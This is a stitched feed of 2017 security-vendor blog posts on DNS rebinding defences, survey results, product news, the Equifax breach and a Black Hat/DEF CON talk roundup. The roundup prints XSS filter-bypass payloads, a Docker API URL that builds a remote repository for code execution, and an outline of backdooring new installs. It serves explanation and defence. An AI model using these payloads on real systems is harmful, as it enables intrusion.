Note: The issue was responsibly reported to Dropbox via Hackerone. It was immediately triaged and awarded with an initial bounty as well as a bonus since the report helped them find another issue.

How Can You Prevent These Type of Attacks?

Simply put, to prevent DNS rebinding attacks at server level just block access and requests when the host header in the HTTP request does not match a white list. Below is an explanation of how you can do this on Apache and IIS web server.

Blocking DNS Rebinding Attacks on Apache Server

On apache you can block access if the host header does not match 127.0.0.1 with mod_authz_host, by adding these lines to your configuration:

<If "%{HTTP_HOST} != '127.0.0.1'">

Require all denied

</If>

Therefore, if someone tries to launch a DNS rebinding attack, the requests will be blocked and the server will return a HTTP 403 message.

Blocking DNS Rebinding Attacks on Windows IIS

It is very easy to block DNS rebinding attacks on the Microsoft IIS web server. All you need to do is add a rule of type “Request blocking” in the URL rewrite menu with the following options:

  • The “Block access based on” field has to be set to “Host header”
  • The “Block request that” field has to be set to “Does Not Match the Pattern”. As pattern one or more host headers can be used. (source).

Other Measures to Block Such Type of Attacks

Another good countermeasure is to block third party cookies in the browser, and to use the same-site attribute in cookies on the web application that is being developed.

Other than that, apply the same security measures on internal websites as if they are publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection and other types of web vulnerabilities to guarantee a safe testing environment.

As an additional security measure run the web application on a virtual machine. Even though this is often not necessary, and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers that want to run vulnerable web applications on their machine.

Netsparker is now an accredited supplier on the UK Government’s Digital Marketplace

$
0
0

Logo for the UK Digital Marketplace

We are pleased to announce that Netsparker Cloud, our enterprise web application scanner has been accepted and enlisted on the UK Digital Marketplace. In order to have gained a place on the UK Digital Marketplace, Netsparker Cloud had to adhere to a number of high-level requirements under the G-Cloud 9 framework, proving that Netsparker is an effective Web Application Security Scanner.

Due to the use of cloud-based computing becoming increasingly commonplace in the UK public sector, having Netsparker Cloud listed on the UK Digital Marketplace has never been more important, as it enables us to support all the branches of the UK government with our easy to use & cutting-edge web application vulnerability scanner. As Netsparker is fit to be used by the agencies of the UK government, businesses should also trust and use Netsparker as well.

For more information about the UK Digital Marketplace, visit their website. Easily perform automated web application security scans of your websites and web applications with Netsparker Cloud, a Free Netsparker Cloud Trial is available on our website.

Visit Netsparker at OWASP AppSec USA 2017 in Orlando

$
0
0

Logo for OWASP AppSec USA 2017 in Orlando.

Netsparker is sponsoring and exhibiting at the OWASP AppSec USA 2017 Conference. The conference will be held on the 21st and 22nd of September at the Disney’s Coronado Springs Resort, Orlando, Florida.

Come and visit us at booth P8 in the exhibitor’s hall and let’s talk web application security, and the benefits of automating the process of identifying vulnerabilities in your web applications and web services. We will also have some of our popular cool swag, so avoid disappointment, come and say hello as early as possible.

For more information about the conference visit the official OWASP AppSec USA Conference website.

Get a $100 Discount on the OWASP Appsec USA Conference Ticket

Use the discount code UNLM100NTSPKR when buying your OWASP AppSec USA Conference ticket to get a $100 discount.


Netsparker Survey Results | Web Developers on Web Application Security, Governments, Most Vulnerable Industries & More

$
0
0

A few weeks ago one of our security researchers was experimenting with DNS Rebinding exploitation. By using such attack method he managed to attack vulnerable web applications hosted behind a firewall, practically bypassing a network firewall.

It is a very interesting attack and you can read Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls to learn more about this subject. Our researcher Sven also gave a live demo of how to bypass firewalls by exploiting vulnerabilities in web applications.

This attack method got us thinking about how many businesses are vulnerable to this type of attack. I mean every developer and security researcher have a half developed or vulnerable web application running in their test environment. With that in mind, and with all the hacking and election hacking news out there, we thought of doing a survey and ask developers some question which hopefully will give us a better insight of how vulnerable corporations are, and who is the biggest target.

Web Developers Demographics

Before diving into the interesting numbers, let's start with some demographics on the web developers who took the survey.

Age of Web Developers

Survey Results - What is your age?

Gender of Web Developers

Survey Results - What is your gender?

Employment status of Web Developers

Survey Results - What is your current employment status?

Industry Sector the Web Developers Work in

Survey Results - Which of the following best represents your job function?

Web Developers Survey Questions

This is where the interesting stuff starts. Let's start with the obvious question:

Do you run a web server (LAMPP / XAMPP / IIS etc.) on your computer or test environment?

Survey Results - Do you run a web server (LAMPP / XAMPP / IIS etc.) on your computer or test environment?

This is somehow surprising to me. To be honest I expected that 99% or all developers have some sort of web server configuration running on their computer or test environment.

Would you say that you typically keep your web server up-to-date?

Survey Results -   Would you say that you typically keep your web server up-to-date?

It is good to see that 89.1% of the web developers we surveyed keep their web server software up to date. This is not surprising because we have really improved when it comes to patch management and network security.

Which of the following, if any, would you say are true of your test environment? (Select all that apply.)

Survey Results - Which of the following, if any, would you say are true of your test environment? (Select all that apply.)

Now, this is where it really starts becoming interesting, or even scary. More than half of the web developers who took the survey admit that sometimes they run half-developed and possibly vulnerable web applications on their computers. This is not bad and kind of expected. What is really scary is that 55.4% of them have connected such computers directly to the internet. That makes them a perfect easy target, even for a script kiddie!

The above also means that on average, one in two businesses are vulnerable to the attacks we mentioned earlier on, therefore should attackers do some homework and target them, they can bypass the victim's corporate firewalls and strike gold.

Which of the following vulnerabilities, if any, put democratic governments most at risk of an election hacking? (Select all that apply.)

Survey Results - Which of the following vulnerabilities, if any, put democratic governments most at risk of an election hacking? (Select all that apply.)

So much has been said about the possibility of tampering with elections etc, but not much has been said on what could possibly allow the intruders to tamper with the process. The majority of the web developers we surveyed think that the top three problems are lack of IT expertise, outdated and possibly insecure polling equipment and that politicians do not believe this is a problem. The latter is true and it is frustrating when you see politicians living in their own cocoon denying such things. 

Which of the following preparations, if any, should democratic governments undergo in order to secure themselves against an election hacking? (Select all that apply.)

Survey Results - Which of the following preparations, if any, should democratic governments undergo in order to secure themselves against an election hacking? (Select all that apply.)

Which of the following concerns, if any, do you think prevent corporate boardrooms from taking cybersecurity seriously? (Select all that apply.)

Survey Results - Which of the following concerns, if any, do you think prevent corporate boardrooms from taking cybersecurity seriously? (Select all that apply.)

It is very interesting to see that 57.4% of the web developers said that their management does not really understand IT. This clearly shows that even though one might have good managerial skills, it does not necessarily mean he is good at managing IT operations and departments. From my own personal experience, nothing beats hands on experience and there is no better manager than one who has worked in the field himself.

Which of the following actions, if any, should companies take in the event of a data breach? (Select all that apply.)

Survey Results - Which of the following actions, if any, should companies take in the event of a data breach? (Select all that apply.)

It might be a small percentage, but it is quite worrying that 6.9% of the developers who participated in the survey believe that companies should try to cover up hack attacks.

Which of the following industries, if any, do you think are most vulnerable to hacking? (Select all that apply.)

Survey Results - Which of the following industries, if any, do you think are most vulnerable to hacking? (Select all that apply.)

Which of the following recent hacks, if any, do you think has been the most innovative? (Select all that apply.)

Survey Results -   Which of the following recent hacks, if any, do you think has been the most innovative? (Select all that apply.)

Which of the following technologies, if any, do you think are most at risk of future hacking for the rest of 2017? (Select all that apply.)

Survey Results - Which of the following technologies, if any, do you think are most at risk of future hacking for the rest of 2017? (Select all that apply.)

What Have We Learnt from this Survey?

We kind of expected such results, but as always, there is a lot to take away from this survey. Here is a recap of what we’ve learnt:

  • More than half of web developers run some sort of incomplete and possibly vulnerable web application. That means that more than half the businesses are possibly vulnerable to some sort of attack.
  • Governments and political parties are the biggest target (political reasons / hacktivism etc) and they need to step up their game when it comes to cybersecurity.
  • People in management should definitely get more involved and better inform themselves.
  • Always contact law enforcement and assess the type of threat, if need be hire specialised IT forensics in case your business is hacked. Never try to cover up. If you try to do it to save the business’ reputation it might and most probably will backfire.
  • After governments, web developers think (and they are right) that the most targeted industries are financial services, media, healthcare and manufacturing.
  • Smart home technology (IoT), web applications and services and connected cars will be the most targeted in the future.

Infographic: Statistics About the Security State of 104 Open Source Web Applications

$
0
0

Infographic highlighting the state of security of 104 open source web applicationsEvery year we publish a number of statistics about the vulnerabilities which the Netsparker web application security scanner automatically identified in open source web applications. Netsparker is a heuristic web application security scanner, so all these vulnerabilities have been identified heuristically, and not with signatures. Here are the numbers for the scans and research we have done in 2016.

Why Do We Use Open Source Web Applications for Testing?

We use open source web applications to test our dead accurate web vulnerability scanning technology because of the diversity. You can find any type of web application you can dream of in the open source community; forum, blog, shopping cart, social network platform etc. You can also find applications written in almost all of the development languages available, such as PHP, Java, Ruby on Rails, ASP.NET etc. In fact, in 2016 we further diversified our test lab and included more web applications that are built with NodeJS, Python and other similar frameworks.

The other reason why we use open source web applications is because once we are doing the testing, we can still give something back to the community. By scanning these web applications and reporting the 0-day  vulnerabilities back to the developers we are helping open source developers write more secure code.

In fact, we are so committed to helping open source projects developers, that we are also giving free Netsparker Cloud accounts to all open source web developers.

Open Source Web Applications, Vulnerabilities & Numbers for 2016

How Many Web Applications and Vulnerabilities?

In 2016 we scanned 104 web applications and identified 129 vulnerabilities in 31 of them. Therefore 29.8% of the scanned web applications had one or more web application vulnerabilities in them.

How Many 0-Day Vulnerabilities Did Netsparker Identify?

During our test scans in 2016, we identified 31 0-day vulnerabilities, and we published 27 advisories, 6 of which were published in 2017. We do not always publish an advisory because it is not always possible to do so. Unfortunately, sometimes there are too many things that restrict us from publishing an advisory.

What About the Other Vulnerabilities?

The other 98 vulnerabilities that the Netsparker web vulnerability scanner identified were known vulnerabilities which have not been fixed yet. We keep a record of these vulnerabilities for two reasons:

  1. To measure the effectiveness of the automated scanner. I.e. if there are known vulnerabilities and the scanner does not identify them it means we are not doing a good enough job. The good news is that Netsparker did not just identify all the known vulnerabilities, but also uncovered 31 0-days.
  2. Even though these are known vulnerabilities, they have not been fixed in the latest version of the software in question. So anyone installing these web application will be vulnerable.

Are We Seeing More Secure Web Applications?

During both of 2015 and 2016, we published fewer advisories than we did in 2014. Does that mean that we are seeing more secure web applications? The answer is both yes and no.

Yes because some of the web application projects that have been around for years are becoming more secure. Their developers have more experience and are learning from the community. WordPress is a perfect example of this; WordPress core is very secure.

At the same time new open source web applications are being released almost on a daily basis, and even though it is not a guarantee, the chances of newly developed web applications having a vulnerability are very high. So there will always be a good number of vulnerable web applications out there.

Trivia: 26 of the scanned web applications were WordPress plugins, 8 of which had vulnerabilities.

Most Common Web Application Vulnerabilities in Open Source Web Applications for 2016

Which were the most common identified web application vulnerabilities in the open source web applications we scanned? Here are the numbers:

The top two culprits are Cross-site Scripting and SQL Injection vulnerabilities, with XSS accounting for a staggering 81.9% of the identified vulnerabilities. This is not unusual, last year we had similar results with 180 XSS and 55 SQL Injection vulnerabilities.

Web Security Automation is the Key

According to the above numbers, on average a vulnerable web application would have 6.6 vulnerabilities. Malicious hackers are definitely happy with the a la carte selection of vulnerabilities they have at their disposal.

This is somehow expected considering the average modern web application has hundreds, if not thousands of possible attack surfaces. Web applications are becoming really complex and unless you automate security, it is impossible to develop a secure web application. Some people might not agree, but how can you, as a web application developer check that every possible attack surface on your web application is not vulnerable to hundreds of different vulnerability variants manually?

Definitely, you cannot and automation is the key here. That’s what we are focusing on at Netsparker. We do not just develop a scanner, but we are developing a web application security solution that generates dead accurate web security scan results, so you do not have to waste time manually verifying the findings.

Free Web Application Security Scans for Open Source Project

Take advantage of our offering and build more secure web applications. As an open source developer, you can get a free Netsparker Cloud account so you can automatically scan your open source projects for web applications. Some open source projects such as OpenCart are already benefiting from free web application security scans.

Missed Black Hat or DEF CON? We've got you covered

$
0
0

I'm sure lots of you are sad that Black Hat USA 2017 and DEF CON 25 are over. You had a hell of a time in Las Vegas, were given the opportunity to listen to some great talks and meet people who share the same interest. And of course, you've learned a lot and attended many great workshops. If one or more of these points apply to you, this article is probably not interesting for you.

You will find this article interesting if:

  • Everybody told you that you need to bring a dedicated travel phone when you pass the customs, however the same people are calling you an idiot for planning to get a burner phone for Black Hat. Out of confusion you just stayed at home.
  • All you wanted is to see the great talks at DEF CON but it got cancelled yet again!
  • You passed out at the bar when the cons started and woke up to people carrying their IMSI catchers out of the hotel at the end of DEF CON. Nothing to see here.
  • Your husband, wife or partner made you sleep on the couch until the end of the conferences because you suggesting to fly a few thousand miles to Sin City and leave them alone at home with the kids.

Or in other words: you couldn't attend. In all of those cases, you were probably interested in seeing the awesome talks. Now I have good news and bad news for you. The bad ones first: There are no videos yet. Yes, both conferences will make videos of the talks available in the course of the following months. However, for now, all you can get are shaky three minute clips of one hour presentations and short PoC videos you won't understand if you didn't see the talk.

Now the good news. There are slides available. Yes, we've sifted through hours worth of "What if I told you?" memes and countless pages with the same diagram but different arrows and we've come up with a list of our favorite slides and papers concerning web application security.

JSON attacks by Alvaro Muñoz and Oleksandr Mirosh

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - JSON attacks by Alvaro Muñoz and Oleksandr Mirosh

We've heard it countless times in recent years; don't use dangerous deserialization functions on user input, just use JSON instead. Let's just say this didn't work out too well. Thanks to these slides you'll get the idea why JSON deserialization is not a good idea either. An absolute must-read if you are a developer, or hacker.

Game of Chromes by Tomer Cohen

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Game of Chromes by Tomer Cohen

Do you keep track of all the extensions you have installed? You probably have a weather widget next to the URL bar, an extension that replaces every occurrence of "APT" with "16 year old hacker" and hopefully an Ad Blocker. However, after reading this paper you'll probably strip them down to a minimum. You'll probably also spend the rest of the day scrolling through your Facebook messages, just to see if a malicious plugin sent a message to some guy you haven't talked to for three years, asking him if he would like to install the coolest Chrome extension you've seen in a while. Awkward.

Summary

  • A malicious Chrome extension was spreading through facebook messages
  • Copy of a legitimate extension in the chrome web store
  • It loaded a script over the internet and injected it into every single page
  • Created wix pages that redirected to attacker's website
  • At a later stage, it used social logins with the victim's Facebook for wix to avoid bot detection

Abusing Certificate Transparency by Hanno Böck

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Abusing Certificate Transparency by Hanno Böck

A modern web without TLS? Not gonna happen. That's why we are amongst the proud sponsors of the Let's Encrypt certificate authority. One particularly useful approach to further secure TLS is the certificate transparency log; whenever a new certificate is created it can be submitted there for anyone to see. So no need to disable zone transfers anymore, yay! *cough*. In the future certificates that aren't in the log won't be accepted by browsers like Google Chrome. Those Certificate Transparency logs are public and Hanno Böck shows you how attackers can abuse this fact to automatically take over web servers by using install scripts before the user can. But don't worry, he'll also show you how to avoid that effectively.

Summary

  • He uses crt.sh to find (sub)domains that just got their SSL certificate
  • He then checks if there's an install script, e.g. for wordpress
  • If there is one, he installs the script using his own database and installs a backdoor script on the server
  • After that he reverts all the changes he made, presenting the user with a fresh install script again, however, it still contains the backdoor

Driving down the rabbit hole by Jesse Michael, Mickey Shkatov and Oleksandr Bazhaniuk

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Driving down the rabbit hole by Jesse Michael, Mickey Shkatov and Oleksandr Bazhaniuk

Alright, you found it out. This one is not purely about web applications. However, it should serve as a quick reminder that you should regularly check if the services you rely on are still up and running. And also that their domain names are not for sale. In this case, it was enough to run `strings` on some debug files to find an expired domain from Nissan. After the researchers registered it they received some interesting data via POST requests. Not only usernames and passwords but also some location data that was showing where the vehicles were driving. On a map, they showed that one car seems to have driven into the Delaware River. Let's just hope this had nothing to do with their research.

Summary

  • They got the complete dashboard of a wrecked Nissan
  • Could obtain navigation system debug data from it
  • They ran strings on the debug files and found the following URL:
    http://biz.nissan-gev.com/WARCondelivbas/it-m_gw10/
  • Since it was expired they registered the domain and got POST requests from different cars, containing location data of different cars.

A new era of SSRF by Orange Tsai

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - A new era of SSRF by Orange Tsai

One of my personal favorites this year. If you've ever written a vulnerability free, RFC conform URL parser you are probably someone with an infinite amount of time and wisdom on your hand. But we mere humans have to rely on the parsers that come with the respective programming language or - even worse - on external libraries. However, it turns out that even the developers of those external parsers are human beings like you and me and make mistakes as well. The author shows how weird the URL parsers of those libraries behave, why CRLF injection is not only a server side problem and even implies that he has at least 3 bypasses for the SSRF protection in WordPress. I for one look forward to see the video of the presentation.

Summary

  • He uses @, #, &, spaces etc. to fool parsers into checking the wrong host name
  • Using HTTPS he shows how to use spaces and CRLF to craft valid SMTP requests
  • He will also show how to abuse the full-width latin capital letter N (U+FF2E) to bypass filters in node.js

Web Cache Deception attack by Omer Gil

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Web Cache Deception attack by Omer Gil

Okay okay, right at the beginning of this article I told you that we would scroll through all the articles with the same pictures but different arrows for you. But that's what you'll find within these slides. However, if you click through exactly 28 pictures of what I assume is the same dog you'll end up on slide 25. This is where the author describes an awesome attack technique that takes advantage of a common (mis)configuration of caching servers together with the behaviour of some web application programming languages and frameworks. So if you like dogs (and let's be honest, who doesn't?) and want to read about cool new attack methods (and let's be honest, who doesn't?) then you shouldn't miss out this article. However, if you don't like dogs but are into cool new attack methods anyway, you can just read the white paper.

Summary

  • You must be able to add a file extension that's cached by a misconfigured intermediate proxy by default, e.g. /index.php/file.css to exploit this vulnerability
  • After that, you have to make a victim visit the page
  • It will be cached by the intermediate proxy and once you open it in your browser, you will see the victim's cached response.

Bypassing XSS Mitigations via script gadgets by Sebastian Lekies, Krzysztof Kotowicz and Eduardo Vela Nava

Bypassing XSS Mitigations via script gadgets by Sebastian Lekies, Krzysztof Kotowicz and Eduardo Vela Nava

Ah yes, the famous black list filters. If you like XSS and challenges you should try to bypass one. More often than not it's pretty easy. Some of them block certain keywords like 'iframe' or 'document' some literally have a regex pattern like <script>.*</script> and others try to prevent exploitation by blacklisting 'alert'. Way to go. But the authors don't seem to be interested in the easy ones. Instead, they are trying to fool strict filters with harmless tags and attributes that become dangerous thanks to existing code on the vulnerable pages. How probable it is to find existing gadgets and how easy it is to exploit them is explained in the slides.

Summary

  • By abusing the fact that some javascript libraries use HTML attributes to evaluate or modify data on the page, you can bypass blacklist filters.
  • Knockout: <div data-bind="value:'alert(1)'"></div>
  • Ajaxify: <div class="document-script">alert(1)</div>
  • Bootstrap: <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'>

How abusing Docker api led to remote code execution by Michael Cherny and Sagie Dulce

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - How abusing Docker api led to remote code execution by Michael Cherny and Sagie Dulce

Did you know how easy it is to abuse internal services using DNS rebinding? Or how dangerous enabled REST APIs are even if they are only reachable on localhost? If not you a) need to be strong now and b) should read our blog post on how hackers can use vulnerable web applications to bypass corporate firewalls.

In this presentation, the author explains how it is possible to get remote code execution by using the Docker REST API if it is enabled. And it seems like this is pretty common. So if you run a docker container, make sure to disable the API and read the linked paper.

Summary

  • They abused the REST API on port 2375
  • Since it binds on localhost by default either CSRF or SSRF are required for exploitation
  • The vulnerable endpoint is  localhost:2375/build
  • A post request to the following URL will create a docker container from a github repository and use the same network as the host machine
    http://localhost:2375/build?remote=https://github.com/<user>/<repository>&networkmode=host

That’s All from BlackHat and Def Con Folks!

Those were our favorite talks of this years DEF CON 25 and Black Hat USA conferences. We are looking forward to seeing the videos of all the slides and hope you enjoyed them as much as we did. It's time to leave the couch now and buy some flowers for your better half.

August 2017 Update of Netsparker Desktop

$
0
0

We are now less than one month away from Autumn, so today we are announcing the end of summer update of Netsparker Desktop. Here is an overview of what is new and improved in this update of our dead accurate web application security scanner.

Support for Multiple Credentials for Different URLs & Authentication Mechanisms

Do you have a web application that has different password protected areas and uses different authentication mechanisms? From this version onwards you can configure all the different sets of credentials and authentication mechanisms in Netsparker so you can scan all sections of the web application in one web vulnerability scan.

How does it work? Simple! When configuring authentication you have to specify the:

  1. Authentication mechanism (NTLM, Basic, Digest, Kerberos)
  2. Credentials
  3. URL of the login form or password protection section

You can read more about this new feature in Configuring Basic, NTLM, Kerberos authentication in Netsparker Web Application Security Scanner.

New Security Checks

We have also added a number of new security checks for the Microsoft’s IIS web server, WordPress and a Remote Code Execution check for Node.js on Windows.

Improved Security Checks and Functionality

In this update of Netsparker Cloud, we also improved the security checks for:

We have also improved the DOM/JavaScript simulations, the performance of a number of security checks, and have also worked on improving the performance of a number of other components in the scanner.

Complete List of What is New, Improved & Fixed

For a complete list of what is new, improved and fixed in the latest version of Netsparker Desktop please refer to the web vulnerability scanner’s changelog.

Configuring Basic, NTLM & Digest Authentication in Netsparker

$
0
0

There are mainly two different ways how to password protect a section on a web application, or all of the web application. You can use form based authentication, which is done at web application level, or you can configure the authentication at web server level using Basic, Digest and NTLM / Kerberos authentication.

This blog post explains how you can configure the credentials in the Netsparker web application security scanner to scan a web application that is password protected with Basic, Digest or NTLM/Kerberos authentication.

Configuring the Credentials & URLs

Configuring Multiple Sets of Credentials and URLs

You can configure the authentication details in Netsparker from the Authentication> Basic, NTML/Kerberos node in the Start a New Website or Web Service Scan dialogue, which is shown in the above screenshot.

When configuring the authentication details you have to specify the:

  • Authentication type (Basic, NTLM, Kerberos, Digest, Negotiate)
  • URL Prefix (the URL of the password protected section)
  • Username & password
  • Domain (this entry is optional for when the domain is required in Windows environments)

Once you configure the authentication details use the Test Credentials button to test the credentials before launching the scan.

Note: Enable the option Do not expect challenge if you want the scanner to send the authorization header for basic authentication without expecting a challenge.

Configuring Multiple Sets of Credentials and URLs

The URL prefix is used to specify the URL of the password protected area. This is particularly useful if you have multiple different password protected areas on the target web application. For example, imagine you have a website http://example.com/ and basic authentication is used to protect the pages under http://example.com/basic/ and NTLM authentication is used to protect the pages under http://example.com/ntlm/. In such case you can configure the below:

Configuring Multiple Sets of Credentials and URLs

Upgrading from Older Versions of Netsparker Desktop

Support for multiple sets of credentials was introduced in Netsparker 4.9.1. If you are updating your older version of Netsparker and have configured credentials;

  1. All saved credentials will be migrated to Basic authentication,
  2. All saved credentials which have a domain configured will be migrated to NTLM authentication.

ProfitKeeper Automates Web Application Security with Netsparker

$
0
0

“We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.”

ProfitKeeper LogoWho can tell it better than the customer himself? This is not the ordinary case study. This is an interview with Tom Mallory, ProfitKeeper’s IT Ninja. In this interview, Mr Mallory explains why he chose Netsparker Web Application Security Scanner and how it helped him improve the security posture of the web applications that he manages.

What Can You Tell Us About ProfitKeeper and Your Role?

When you wear as many hats as I do, I think the only option is to refer to yourself as an IT Ninja. Right?

ProfitKeeper has been in business for over 13 years, teaming with franchisors to help them increase their profits. Although we provide services to very large, established franchises, we pride ourselves in individualized attention to all our partners no matter the size.

From a technical standpoint, we’re in the Finance/Analytics industry because that is the type of data we’re working with. But we’re also in the customer service business in the sense that we have clients/customers who trust and rely upon not only the data we provide them but also our ability to keep that data safe.

Can you tell us a bit about your web environment and applications?

Our web applications are built with .NET. They run on Microsoft’s IIS web server and use the Microsoft SQL server as a database backend. We currently manage three web applications that are responsible for generating data surrounding KPIs, royalty reporting, business accounting and payroll.

What Made You Decide to Try Netsparker Web Application Security Scanner?

We have been using Netsparker for about one-year now. It’s essentially the first time that we’ve relied upon a third-party automated web application security scanner to perform a thorough penetration test.

A major point of attraction, at least initially, was the number of positive reviews. We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.

Once we dove into using Netsparker (which right now is about once per week) we were impressed by the ease of setup and ongoing use. I wish I could comment on support but we haven’t really had any issues to speak of.

Believe it or not, in the years prior to using Netsparker we were performing all of our testing manually. You don’t really realize how much time and effort an automated web application security scanner can save you until you try it. Moving back to a manual process seems unfathomable at this point in time.

A large part of our decision to begin using Netsparker came from our long-term acknowledgement that we need to do everything in our power to ensure that our clients’ data is safe and secure.

With both personally identifiable information and financials being at risk, we already understood the importance of continually minimizing the ways in which a malicious hacker could access critical information.

How Has Netsparker Helped to Reduce Security Vulnerabilities?

As you know, performing manual penetration testing is an arduous process. Netsparker not only makes us faster but also better. Netsparker, and the automation it provides, has allowed us to make our processes as efficient as possible while building more secure web applications.

One feature we really which also helped us significantly reduce the probability of human error is the Proof-Based Scanning Technology, which automatically verifies the identified vulnerabilities. That’s a lifesaver for me, because I do not need to know how to reproduce every vulnerability that’s out there. 

As regards the findings in our web applications, although we found our code to be void of vulnerabilities, Netsparker helped to confirm this in addition to allowing us to find areas of code that had the potential to cause security issues such as SQL Injection vulnerabilities.

An often overlooked benefit of Netsparker: It makes you more aware of areas that present the potential for security vulnerabilities.

Would you like to add anything else?

Netsparker was extremely easy to setup and use but provided world class information on potential web application vulnerabilities that if exposed, could cost us our company.

Live Demo of How to Bypass Web Application Firewalls & Filters

$
0
0

Many assume that a web application firewall is enough to protect web applications from malicious attacks. Therefore fixing security vulnerabilities is not necessary thanks to the WAF’s blacklist of functions, keywords or characters. However, expectations are very different from reality.

Watch episode 526 of Paul’s Security Weekly during which our security researcher Sven busts the myths and demos how attackers can bypass web application firewalls and all kinds of blacklist filters to attack and exploit security holes in vulnerable websites. In his demo Sven shows how to:

  • Bypass Cross Site Scripting, Command Injection and Code Evaluation filters that were meant to protect your web applications
  • Avoid being caught by WAFs
  • And how to generally approach them.

During the demo, Sven also explains why it is not possible to have one payload that bypasses all filters, and why less is often more when it comes to bypassing such security mechanisms.


Risky Business Podcast Interviews Ferruh Mavituna on How to Find Vulnerabilities in Thousand Web Applications

$
0
0

Award-winning journalist Patrick Gray interviewed our CEO, Ferruh Mavituna, on how to find vulnerabilities in more than 1,000 web applications.

During the interview, Ferruh explains that once you publish a web application online – even if it is a very basic one – a hacker will find it within a few minutes. This highlights how important it is for enterprises to ensure that all of their web applications are secure.

Ferruh also explains that the automated nature of Netsparker Cloud facilitates the task of keeping thousands of websites and web applications secure. Development teams will not be overwhelmed by securing a large number of websites.

Toward the end of the interview, Ferruh also provides tips on how teams can start to tackle the massive problem of securing thousands of web applications, where their effort should be directed, and how best to use team resources quickly and efficiently.

You can listen to the full Risky Business Episode #468 episode from the Risky Business website. Ferruh’s interview is the last feature in the podcast, which begins at 37 minutes.

Netsparker Sponsors BSides DC 2017

$
0
0

Logo for BSides DC

We are excited to announce our sponsorship of the B-Sides DC Conference in Washington, D.C, which takes place from the 7th of October to the 8th of October 2017. During the conference, we will be exhibiting Netsparker our award winningweb application security scanner.

B-Sides DC is a community-driven event developed by and for information security practitioners who seek to expand the spectrum of conversations and create opportunities, in an intimate atmosphere that encourages collaboration.

The venue for B-Sides DC is the Renaissance Washington DC Downtown Hotel.

For more information, visit the B-Sides DC website where you can find out more about the event and how to support it.

Come by our booth while at B-Sides DC 2017

If you are attending B-Sides DC, then come and visit us at our booth. We will be more than happy to answer any questions you might have about web application vulnerability scanning and Netsparker.

The Equifax Breach – The Signs Were There

$
0
0

Whenever a big data breach happens – like the Equifax one – there is almost always a predictable order of subsequent events:

  1. The breach happens
  2. The affected company announces it
  3. The news outlets pick up the story and make it known to the general public
  4. Security researchers wonder how the breach might have happened and investigate further

Then there is the aha moment: security researchers stumble a catastrophic lack of security practices, countless numbers of vulnerabilities and breaches of well-established protocols.

Does It Have to Be Like This?

In the end, the public often knows more about the dangerous vulnerabilities in the company's website than the actual attacker. Given enough eyeballs, all bugs become more shallow – particularly once an organisation is under public scrutiny.

Going back to the series of events, you might conclude that we could completely eliminate events one to three, if there were more security researchers examining the security of their own products. So what would have happened if someone had warned Equifax about vulnerabilities on their websites before the breach happened? Would they have listened to concerned researchers?

In 2016 Equifax Was Notified That Their Website Was Vulnerable To a Cross-site Scripting Vulnerability

It seems that – even though they were notified in 2016 about a vulnerability on their website – they did not address the issue. In this instance, it seems that XSS (Cross-site Scripting) is probably not the reason why the Equifax website was breached. However, the incident does illuminate their security protocols.

The consensus about the Equifax breach is that they were vulnerable to another kind of web application vulnerability – one that did not require interaction by a privileged user to gain access to administrative functions. Instead it is one that usually results in the complete compromise of a web server and the applications running on it – Remote Code Execution (RCE).

Equifax Website Hacked Through the Exploitation of CVE-2017-5638

On March 6, 2017, The Apache Software Foundation published a security advisory about a new vulnerability affecting the Apache Struts 2 framework. By manipulating certain HTTP headers, an attacker could easily execute system commands on affected systems.

As it often happens with this kind of vulnerability, it did not take long for attackers to take advantage of the flaw, and use bots to crawl the web for vulnerable hosts. Organisations that take security seriously are unaffected, because they immediately follow the recommended steps to fix it. However, many do not, as reported by security researcher David Hoyt.

He posted screenshots of the vulnerability in question being exploited on the website annualcreditreport.com, which is owned by Equifax, Experian and TransUnion. They were notified about their vulnerable website by David Hoyt four days after the Apache Struts advisory was released, but he never heard back from them.

According to Equifax, the data breach occurred between mid May and July. Therefore if they had acknowledged and reacted to the security researcher's report, the vulnerability would have been closed and other systems could have been checked for the said vulnerability as well, avoiding the breach and all the mess they are into right now.

David Hoyt on the State of Security of the AnnualCreditReport Website

We asked David Hoyt for his thoughts on the vulnerability and Equifax’s decision not to respond. He sent us a detailed report about the Apache Struts deserialization vulnerability in www.annualcreditreport.com, with a few surprising statements:

The Form on annualcreditreport.com accepts the PII of Consumers, then connects via API to the 3 Credit Reporting Agencies, and other Fraud and Loss Control Partners. The typical Form containing 1 SSN may be parsed and distributed to many, many more 3rd parties. Any successful Attack may expose millions of PII Records from a Database.

This seems to suggest that if the hackers had chosen to attack annualcreditreport.com, they could have compromised a far greater number of accounts and would have breached Experian and TransUnion as well. Given the easily exploitable vulnerability that David Hoyt found in the website, it is surprising that it had not already been exploited by attackers before the breach was announced.

No WAFs or IDS/IPS were Installed in Front of the AnnualCreditReport Website

Dissecting some of the Indicators of Poor Judgement, my own research indicated _no_ Web Application Filter in front of annualcreditreport.com or consumer.experian.in and neither Site had any IDS/IPS to block Command Line Injection.

This is surprising for such a large website. While many Web Application Firewalls can be bypassed, they should still be implemented since they act as a first line of defense when a new vulnerability is made public. It is doubtful whether they can halt seasoned attackers completely, but they are great for blocking automated attacks and can be used to slow down hackers until a patch is applied. This should be a basic security measure by anyone dealing with Personally Identifiable Information such as SSNs but the fact that it was not applied by Equifax put consumers’ data at unnecessary risk.

The Information Security Industry Vendors and Service Providers Can Do More

Hoyt also thinks that Information Security vendors and service providers can do more to avoid still having a lot of unpatched websites days after such announcements:

The InfoSec Industry should work on mitigating the exposure of their Clients in the first 24 hours after major Bug announcements, not promoting SEO Campaigns. Alerting an Organization to this Apache Struts Vulnerability should have received priority as the business day came to a close on March 10, 2017 at 4pm Eastern Time. At that point in time, at least 72 hours had elapsed since the Public Announcement.

